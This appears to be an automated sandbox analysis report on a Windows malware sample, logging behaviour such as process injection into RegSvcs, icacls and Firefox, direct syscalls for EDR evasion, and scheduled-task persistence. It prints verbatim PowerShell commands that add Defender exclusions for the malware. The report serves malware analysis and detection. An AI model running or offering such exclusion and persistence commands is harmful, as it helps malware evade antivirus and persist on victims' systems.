Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtTerminateThread: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\icacls.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: NULL target: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: NULL target: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\icacls.exe

Thread register set: target process: 7984

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\icacls.exe

Thread APC queued: target process: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FE1008	Jump to behavior

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp6426.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vssfbkdOErXuYi" /XML "C:\Users\user\AppData\Local\Temp\tmp91BE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vssfbkdOErXuYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127551729.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000000.1807811746.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963403903.0000000001180000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127551729.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000000.1807811746.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963403903.0000000001180000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127551729.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000000.1807811746.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963403903.0000000001180000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: qLmzoTzSrlQuBN.exe, 0000000B.00000002.4127551729.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 0000000B.00000000.1807811746.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, qLmzoTzSrlQuBN.exe, 00000013.00000000.1963403903.0000000001180000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\fHkdf4WB7zhMcqP.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
